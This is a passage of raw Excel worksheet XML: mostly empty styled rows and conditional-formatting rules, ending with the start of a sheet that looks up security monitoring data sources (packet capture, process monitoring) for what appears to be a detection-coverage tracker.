      <c r="C307" s="14"/>
      <c r="D307" s="14"/>
      <c r="E307" s="14"/>
      <c r="F307" s="15"/>
    </row>
    <row r="308" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C308" s="14"/>
      <c r="D308" s="14"/>
      <c r="E308" s="14"/>
      <c r="F308" s="15"/>
    </row>
    <row r="309" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C309" s="14"/>
      <c r="D309" s="14"/>
      <c r="E309" s="14"/>
      <c r="F309" s="15"/>
    </row>
    <row r="310" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C310" s="14"/>
      <c r="D310" s="14"/>
      <c r="E310" s="14"/>
      <c r="F310" s="15"/>
    </row>
    <row r="311" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C311" s="14"/>
      <c r="D311" s="14"/>
      <c r="E311" s="14"/>
      <c r="F311" s="15"/>
    </row>
    <row r="312" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C312" s="14"/>
      <c r="D312" s="14"/>
      <c r="E312" s="14"/>
      <c r="F312" s="15"/>
    </row>
    <row r="313" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C313" s="14"/>
      <c r="D313" s="14"/>
      <c r="E313" s="14"/>
      <c r="F313" s="15"/>
    </row>
    <row r="314" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C314" s="14"/>
      <c r="D314" s="14"/>
      <c r="E314" s="14"/>
      <c r="F314" s="15"/>
    </row>
    <row r="315" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C315" s="14"/>
      <c r="D315" s="14"/>
      <c r="E315" s="14"/>
      <c r="F315" s="15"/>
    </row>
    <row r="316" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C316" s="14"/>
      <c r="D316" s="14"/>
      <c r="E316" s="14"/>
      <c r="F316" s="15"/>
    </row>
    <row r="317" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C317" s="14"/>
      <c r="D317" s="14"/>
      <c r="E317" s="14"/>
      <c r="F317" s="15"/>
    </row>
    <row r="318" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C318" s="14"/>
      <c r="D318" s="14"/>
      <c r="E318" s="14"/>
      <c r="F318" s="15"/>
    </row>
    <row r="319" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C319" s="14"/>
      <c r="D319" s="14"/>
      <c r="E319" s="14"/>
      <c r="F319" s="15"/>
    </row>
    <row r="320" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C320" s="14"/>
      <c r="D320" s="14"/>
      <c r="E320" s="14"/>
      <c r="F320" s="15"/>
    </row>
    <row r="321" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C321" s="14"/>
      <c r="D321" s="14"/>
      <c r="E321" s="14"/>
      <c r="F321" s="15"/>
    </row>
    <row r="322" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C322" s="14"/>
      <c r="D322" s="14"/>
      <c r="E322" s="14"/>
      <c r="F322" s="15"/>
    </row>
    <row r="323" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C323" s="14"/>
      <c r="D323" s="14"/>
      <c r="E323" s="14"/>
      <c r="F323" s="15"/>
    </row>
    <row r="324" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C324" s="14"/>
      <c r="D324" s="14"/>
      <c r="E324" s="14"/>
      <c r="F324" s="15"/>
    </row>
    <row r="325" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C325" s="14"/>
      <c r="D325" s="14"/>
      <c r="E325" s="14"/>
      <c r="F325" s="15"/>
    </row>
    <row r="326" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C326" s="14"/>
      <c r="D326" s="14"/>
      <c r="E326" s="14"/>
      <c r="F326" s="15"/>
    </row>
    <row r="327" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C327" s="14"/>
      <c r="D327" s="14"/>
      <c r="E327" s="14"/>
      <c r="F327" s="15"/>
    </row>
    <row r="328" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C328" s="14"/>
      <c r="D328" s="14"/>
      <c r="E328" s="14"/>
      <c r="F328" s="15"/>
    </row>
    <row r="329" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C329" s="14"/>
      <c r="D329" s="14"/>
      <c r="E329" s="14"/>
      <c r="F329" s="15"/>
    </row>
    <row r="330" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C330" s="14"/>
      <c r="D330" s="14"/>
      <c r="E330" s="14"/>
      <c r="F330" s="15"/>
    </row>
    <row r="331" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C331" s="14"/>
      <c r="D331" s="14"/>
      <c r="E331" s="14"/>
      <c r="F331" s="15"/>
    </row>
    <row r="332" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C332" s="14"/>
      <c r="D332" s="14"/>
      <c r="E332" s="14"/>
      <c r="F332" s="15"/>
    </row>
    <row r="333" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C333" s="14"/>
      <c r="D333" s="14"/>
      <c r="E333" s="14"/>
      <c r="F333" s="15"/>
    </row>
    <row r="334" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C334" s="14"/>
      <c r="D334" s="14"/>
      <c r="E334" s="14"/>
      <c r="F334" s="15"/>
    </row>
    <row r="335" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C335" s="14"/>
      <c r="D335" s="14"/>
      <c r="E335" s="14"/>
      <c r="F335" s="15"/>
    </row>
    <row r="336" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C336" s="14"/>
      <c r="D336" s="14"/>
      <c r="E336" s="14"/>
      <c r="F336" s="15"/>
    </row>
    <row r="337" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C337" s="14"/>
      <c r="D337" s="14"/>
      <c r="E337" s="14"/>
      <c r="F337" s="15"/>
    </row>
    <row r="338" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C338" s="14"/>
      <c r="D338" s="14"/>
      <c r="E338" s="14"/>
      <c r="F338" s="15"/>
    </row>
    <row r="339" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C339" s="14"/>
      <c r="D339" s="14"/>
      <c r="E339" s="14"/>
      <c r="F339" s="15"/>
    </row>
    <row r="340" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C340" s="14"/>
      <c r="D340" s="14"/>
      <c r="E340" s="14"/>
      <c r="F340" s="15"/>
    </row>
    <row r="341" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C341" s="14"/>
      <c r="D341" s="14"/>
      <c r="E341" s="14"/>
      <c r="F341" s="15"/>
    </row>
    <row r="342" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C342" s="14"/>
      <c r="D342" s="14"/>
      <c r="E342" s="14"/>
      <c r="F342" s="15"/>
    </row>
    <row r="343" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C343" s="14"/>
      <c r="D343" s="14"/>
      <c r="E343" s="14"/>
      <c r="F343" s="15"/>
    </row>
    <row r="344" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C344" s="14"/>
      <c r="D344" s="14"/>
      <c r="E344" s="14"/>
      <c r="F344" s="15"/>
    </row>
    <row r="345" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C345" s="14"/>
      <c r="D345" s="14"/>
      <c r="E345" s="14"/>
      <c r="F345" s="15"/>
    </row>
    <row r="346" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C346" s="14"/>
      <c r="D346" s="14"/>
      <c r="E346" s="14"/>
      <c r="F346" s="15"/>
    </row>
    <row r="347" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C347" s="14"/>
      <c r="D347" s="14"/>
      <c r="E347" s="14"/>
      <c r="F347" s="15"/>
    </row>
    <row r="348" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C348" s="14"/>
      <c r="D348" s="14"/>
      <c r="E348" s="14"/>
      <c r="F348" s="15"/>
    </row>
    <row r="349" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C349" s="14"/>
      <c r="D349" s="14"/>
      <c r="E349" s="14"/>
      <c r="F349" s="15"/>
    </row>
    <row r="350" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C350" s="14"/>
      <c r="D350" s="14"/>
      <c r="E350" s="14"/>
      <c r="F350" s="15"/>
    </row>
    <row r="351" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C351" s="14"/>
      <c r="D351" s="14"/>
      <c r="E351" s="14"/>
      <c r="F351" s="15"/>
    </row>
    <row r="352" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C352" s="14"/>
      <c r="D352" s="14"/>
      <c r="E352" s="14"/>
      <c r="F352" s="15"/>
    </row>
    <row r="353" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C353" s="14"/>
      <c r="D353" s="14"/>
      <c r="E353" s="14"/>
      <c r="F353" s="15"/>
    </row>
    <row r="354" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C354" s="14"/>
      <c r="D354" s="14"/>
      <c r="E354" s="14"/>
      <c r="F354" s="15"/>
    </row>
    <row r="355" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C355" s="14"/>
      <c r="D355" s="14"/>
      <c r="E355" s="14"/>
      <c r="F355" s="15"/>
    </row>
    <row r="356" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C356" s="14"/>
      <c r="D356" s="14"/>
      <c r="E356" s="14"/>
      <c r="F356" s="15"/>
    </row>
    <row r="357" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C357" s="14"/>
      <c r="D357" s="14"/>
      <c r="E357" s="14"/>
      <c r="F357" s="15"/>
    </row>
    <row r="358" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C358" s="14"/>
      <c r="D358" s="14"/>
      <c r="E358" s="14"/>
      <c r="F358" s="15"/>
    </row>
    <row r="359" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C359" s="14"/>
      <c r="D359" s="14"/>
      <c r="E359" s="14"/>
      <c r="F359" s="15"/>
    </row>
    <row r="360" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C360" s="14"/>
      <c r="D360" s="14"/>
      <c r="E360" s="14"/>
      <c r="F360" s="15"/>
    </row>
    <row r="361" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C361" s="14"/>
      <c r="D361" s="14"/>
      <c r="E361" s="14"/>
      <c r="F361" s="15"/>
    </row>
    <row r="362" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C362" s="14"/>
      <c r="D362" s="14"/>
      <c r="E362" s="14"/>
      <c r="F362" s="15"/>
    </row>
    <row r="363" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C363" s="14"/>
      <c r="D363" s="14"/>
      <c r="E363" s="14"/>
      <c r="F363" s="15"/>
    </row>
    <row r="364" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C364" s="14"/>
      <c r="D364" s="14"/>
      <c r="E364" s="14"/>
      <c r="F364" s="15"/>
    </row>
    <row r="365" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C365" s="14"/>
      <c r="D365" s="14"/>
      <c r="E365" s="14"/>
      <c r="F365" s="15"/>
    </row>
    <row r="366" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C366" s="14"/>
      <c r="D366" s="14"/>
      <c r="E366" s="14"/>
      <c r="F366" s="15"/>
    </row>
    <row r="367" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C367" s="14"/>
      <c r="D367" s="14"/>
      <c r="E367" s="14"/>
      <c r="F367" s="15"/>
    </row>
    <row r="368" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C368" s="14"/>
      <c r="D368" s="14"/>
      <c r="E368" s="14"/>
      <c r="F368" s="15"/>
    </row>
    <row r="369" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C369" s="14"/>
      <c r="D369" s="14"/>
      <c r="E369" s="14"/>
      <c r="F369" s="15"/>
    </row>
    <row r="370" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C370" s="14"/>
      <c r="D370" s="14"/>
      <c r="E370" s="14"/>
      <c r="F370" s="15"/>
    </row>
    <row r="371" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C371" s="14"/>
      <c r="D371" s="14"/>
      <c r="E371" s="14"/>
      <c r="F371" s="15"/>
    </row>
    <row r="372" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C372" s="14"/>
      <c r="D372" s="14"/>
      <c r="E372" s="14"/>
      <c r="F372" s="15"/>
    </row>
    <row r="373" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C373" s="14"/>
      <c r="D373" s="14"/>
      <c r="E373" s="14"/>
      <c r="F373" s="15"/>
    </row>
    <row r="374" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C374" s="14"/>
      <c r="D374" s="14"/>
      <c r="E374" s="14"/>
      <c r="F374" s="15"/>
    </row>
    <row r="375" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C375" s="14"/>
      <c r="D375" s="14"/>
      <c r="E375" s="14"/>
      <c r="F375" s="15"/>
    </row>
    <row r="376" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C376" s="14"/>
      <c r="D376" s="14"/>
      <c r="E376" s="14"/>
      <c r="F376" s="15"/>
    </row>
    <row r="377" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C377" s="14"/>
      <c r="D377" s="14"/>
      <c r="E377" s="14"/>
      <c r="F377" s="15"/>
    </row>
    <row r="378" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C378" s="14"/>
      <c r="D378" s="14"/>
      <c r="E378" s="14"/>
      <c r="F378" s="15"/>
    </row>
    <row r="379" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C379" s="14"/>
      <c r="D379" s="14"/>
      <c r="E379" s="14"/>
      <c r="F379" s="15"/>
    </row>
    <row r="380" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C380" s="14"/>
      <c r="D380" s="14"/>
      <c r="E380" s="14"/>
      <c r="F380" s="15"/>
    </row>
    <row r="381" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C381" s="14"/>
      <c r="D381" s="14"/>
      <c r="E381" s="14"/>
      <c r="F381" s="15"/>
    </row>
    <row r="382" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C382" s="14"/>
      <c r="D382" s="14"/>
      <c r="E382" s="14"/>
      <c r="F382" s="15"/>
    </row>
    <row r="383" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C383" s="14"/>
      <c r="D383" s="14"/>
      <c r="E383" s="14"/>
      <c r="F383" s="15"/>
    </row>
    <row r="384" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C384" s="14"/>
      <c r="D384" s="14"/>
      <c r="E384" s="14"/>
      <c r="F384" s="15"/>
    </row>
    <row r="385" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C385" s="14"/>
      <c r="D385" s="14"/>
      <c r="E385" s="14"/>
      <c r="F385" s="15"/>
    </row>
    <row r="386" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C386" s="14"/>
      <c r="D386" s="14"/>
      <c r="E386" s="14"/>
      <c r="F386" s="15"/>
    </row>
    <row r="387" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C387" s="14"/>
      <c r="D387" s="14"/>
      <c r="E387" s="14"/>
      <c r="F387" s="15"/>
    </row>
    <row r="388" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C388" s="14"/>
      <c r="D388" s="14"/>
      <c r="E388" s="14"/>
      <c r="F388" s="15"/>
    </row>
    <row r="389" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C389" s="14"/>
      <c r="D389" s="14"/>
      <c r="E389" s="14"/>
      <c r="F389" s="15"/>
    </row>
    <row r="390" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C390" s="14"/>
      <c r="D390" s="14"/>
      <c r="E390" s="14"/>
      <c r="F390" s="15"/>
    </row>
    <row r="391" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C391" s="14"/>
      <c r="D391" s="14"/>
      <c r="E391" s="14"/>
      <c r="F391" s="15"/>
    </row>
    <row r="392" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C392" s="14"/>
      <c r="D392" s="14"/>
      <c r="E392" s="14"/>
      <c r="F392" s="15"/>
    </row>
    <row r="393" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C393" s="14"/>
      <c r="D393" s="14"/>
      <c r="E393" s="14"/>
      <c r="F393" s="15"/>
    </row>
    <row r="394" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C394" s="14"/>
      <c r="D394" s="14"/>
      <c r="E394" s="14"/>
      <c r="F394" s="15"/>
    </row>
    <row r="395" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C395" s="14"/>
      <c r="D395" s="14"/>
      <c r="E395" s="14"/>
      <c r="F395" s="15"/>
    </row>
    <row r="396" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C396" s="14"/>
      <c r="D396" s="14"/>
      <c r="E396" s="14"/>
      <c r="F396" s="15"/>
    </row>
    <row r="397" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C397" s="14"/>
      <c r="D397" s="14"/>
      <c r="E397" s="14"/>
      <c r="F397" s="15"/>
    </row>
    <row r="398" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C398" s="14"/>
      <c r="D398" s="14"/>
      <c r="E398" s="14"/>
      <c r="F398" s="15"/>
    </row>
    <row r="399" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C399" s="14"/>
      <c r="D399" s="14"/>
      <c r="E399" s="14"/>
      <c r="F399" s="15"/>
    </row>
    <row r="400" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C400" s="14"/>
      <c r="D400" s="14"/>
      <c r="E400" s="14"/>
      <c r="F400" s="15"/>
    </row>
    <row r="401" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C401" s="14"/>
      <c r="D401" s="14"/>
      <c r="E401" s="14"/>
      <c r="F401" s="15"/>
    </row>
    <row r="402" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C402" s="14"/>
      <c r="D402" s="14"/>
      <c r="E402" s="14"/>
      <c r="F402" s="15"/>
    </row>
    <row r="403" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C403" s="14"/>
      <c r="D403" s="14"/>
      <c r="E403" s="14"/>
      <c r="F403" s="15"/>
    </row>
    <row r="404" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C404" s="14"/>
      <c r="D404" s="14"/>
      <c r="E404" s="14"/>
      <c r="F404" s="15"/>
    </row>
    <row r="405" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C405" s="14"/>
      <c r="D405" s="14"/>
      <c r="E405" s="14"/>
      <c r="F405" s="15"/>
    </row>
    <row r="406" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C406" s="14"/>
      <c r="D406" s="14"/>
      <c r="E406" s="14"/>
      <c r="F406" s="15"/>
    </row>
    <row r="407" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C407" s="14"/>
      <c r="D407" s="14"/>
      <c r="E407" s="14"/>
      <c r="F407" s="15"/>
    </row>
    <row r="408" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C408" s="14"/>
      <c r="D408" s="14"/>
      <c r="E408" s="14"/>
      <c r="F408" s="15"/>
    </row>
    <row r="409" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C409" s="14"/>
      <c r="D409" s="14"/>
      <c r="E409" s="14"/>
      <c r="F409" s="15"/>
    </row>
    <row r="410" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C410" s="14"/>
      <c r="D410" s="14"/>
      <c r="E410" s="14"/>
      <c r="F410" s="15"/>
    </row>
    <row r="411" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C411" s="14"/>
      <c r="D411" s="14"/>
      <c r="E411" s="14"/>
      <c r="F411" s="15"/>
    </row>
    <row r="412" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C412" s="14"/>
      <c r="D412" s="14"/>
      <c r="E412" s="14"/>
      <c r="F412" s="15"/>
    </row>
    <row r="413" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C413" s="14"/>
      <c r="D413" s="14"/>
      <c r="E413" s="14"/>
      <c r="F413" s="15"/>
    </row>
    <row r="414" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C414" s="14"/>
      <c r="D414" s="14"/>
      <c r="E414" s="14"/>
      <c r="F414" s="15"/>
    </row>
    <row r="415" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C415" s="14"/>
      <c r="D415" s="14"/>
      <c r="E415" s="14"/>
      <c r="F415" s="15"/>
    </row>
    <row r="416" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C416" s="14"/>
      <c r="D416" s="14"/>
      <c r="E416" s="14"/>
      <c r="F416" s="15"/>
    </row>
    <row r="417" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C417" s="14"/>
      <c r="D417" s="14"/>
      <c r="E417" s="14"/>
      <c r="F417" s="15"/>
    </row>
    <row r="418" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C418" s="14"/>
      <c r="D418" s="14"/>
      <c r="E418" s="14"/>
      <c r="F418" s="15"/>
    </row>
    <row r="419" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C419" s="14"/>
      <c r="D419" s="14"/>
      <c r="E419" s="14"/>
      <c r="F419" s="15"/>
    </row>
    <row r="420" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C420" s="14"/>
      <c r="D420" s="14"/>
      <c r="E420" s="14"/>
      <c r="F420" s="15"/>
    </row>
    <row r="421" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C421" s="14"/>
      <c r="D421" s="14"/>
      <c r="E421" s="14"/>
      <c r="F421" s="15"/>
    </row>
    <row r="422" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C422" s="14"/>
      <c r="D422" s="14"/>
      <c r="E422" s="14"/>
      <c r="F422" s="15"/>
    </row>
    <row r="423" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C423" s="14"/>
      <c r="D423" s="14"/>
      <c r="E423" s="14"/>
      <c r="F423" s="15"/>
    </row>
    <row r="424" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C424" s="14"/>
      <c r="D424" s="14"/>
      <c r="E424" s="14"/>
      <c r="F424" s="15"/>
    </row>
    <row r="425" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C425" s="14"/>
      <c r="D425" s="14"/>
      <c r="E425" s="14"/>
      <c r="F425" s="15"/>
    </row>
    <row r="426" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C426" s="14"/>
      <c r="D426" s="14"/>
      <c r="E426" s="14"/>
      <c r="F426" s="15"/>
    </row>
    <row r="427" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C427" s="14"/>
      <c r="D427" s="14"/>
      <c r="E427" s="14"/>
      <c r="F427" s="15"/>
    </row>
    <row r="428" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C428" s="14"/>
      <c r="D428" s="14"/>
      <c r="E428" s="14"/>
      <c r="F428" s="15"/>
    </row>
    <row r="429" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C429" s="14"/>
      <c r="D429" s="14"/>
      <c r="E429" s="14"/>
      <c r="F429" s="15"/>
    </row>
    <row r="430" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C430" s="14"/>
      <c r="D430" s="14"/>
      <c r="E430" s="14"/>
      <c r="F430" s="15"/>
    </row>
    <row r="431" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C431" s="14"/>
      <c r="D431" s="14"/>
      <c r="E431" s="14"/>
      <c r="F431" s="15"/>
    </row>
  </sheetData>
  <conditionalFormatting sqref="F2:F80">
    <cfRule type="dataBar" priority="4">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF2C578C"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{99251DE5-4CC0-42A8-ADF2-4A796373022F}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I8">
    <cfRule type="colorScale" priority="5">
      <colorScale>
        <cfvo type="min"/>
        <cfvo type="percent" val="50"/>
        <cfvo type="max"/>
        <color rgb="FFF8696B"/>
        <color rgb="FFFFEB84"/>
        <color rgb="FF63BE7B"/>
      </colorScale>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="C2:E1048576">
    <cfRule type="dataBar" priority="3">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF76AAD4"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{DE5B108D-72D9-4A03-A413-D92071D2C303}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="F81:F245">
    <cfRule type="dataBar" priority="1">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF2C578C"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{CE2FE5C7-3DDB-4C24-A14A-A68AEE43D83D}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>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9251DE5-4CC0-42A8-ADF2-4A796373022F}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0" direction="leftToRight">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>F2:F80</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{DE5B108D-72D9-4A03-A413-D92071D2C303}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>C2:E1048576</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{CE2FE5C7-3DDB-4C24-A14A-A68AEE43D83D}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0" direction="leftToRight">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>F81:F245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V569"/>
  <sheetViews>
    <sheetView tabSelected="1" zoomScale="140" zoomScaleNormal="140" workbookViewId="0">
      <selection activeCell="B597" sqref="B597"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="8.83203125" defaultRowHeight="15" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="16.1640625" style="4" customWidth="1"/>
    <col min="2" max="2" width="124.83203125" style="4" customWidth="1"/>
    <col min="3" max="3" width="21" style="5" customWidth="1"/>
    <col min="4" max="4" width="15.6640625" style="4" customWidth="1"/>
    <col min="5" max="6" width="11.1640625" style="4" customWidth="1"/>
    <col min="7" max="7" width="47.6640625" style="12" customWidth="1"/>
    <col min="8" max="22" width="9.1640625" style="3" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:7" ht="33" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A1" s="28" t="s">
        <v>37</v>
      </c>
      <c r="B1" s="28" t="s">
        <v>38</v>
      </c>
      <c r="C1" s="28" t="s">
        <v>39</v>
      </c>
      <c r="D1" s="28" t="s">
        <v>40</v>
      </c>
      <c r="E1" s="28" t="s">
        <v>41</v>
      </c>
      <c r="F1" s="28" t="s">
        <v>42</v>
      </c>
      <c r="G1" s="28" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="2" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A2" s="55" t="s">
        <v>44</v>
      </c>
      <c r="B2" s="13" t="str">
        <f>LOOKUP(A2,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Process use of network,Process monitoring,Network protocol analysis</v>
      </c>
      <c r="C2" s="17" t="s">
        <v>134</v>
      </c>
      <c r="D2" s="13">
        <f>LEN(TRIM(B2))-LEN(SUBSTITUTE(TRIM(B2),",",""))+1</f>
        <v>4</v>
      </c>
      <c r="E2" s="13">
        <f t="shared" ref="E2:E8" si="0">LEN(TRIM(C2))-LEN(SUBSTITUTE(TRIM(C2),";",""))+1</f>
        <v>4</v>
      </c>
      <c r="F2" s="18"/>
      <c r="G2" s="13">
        <f>SUM(COUNTA('REF-DataSources'!A:A)-COUNTA(A:A))</f>
        <v>0</v>
      </c>
    </row>
    <row r="3" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A3" s="55" t="s">
        <v>540</v>
      </c>
      <c r="B3" s="13" t="str">
        <f>LOOKUP(A3,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Process use of network,Process monitoring,Network protocol analysis</v>
      </c>
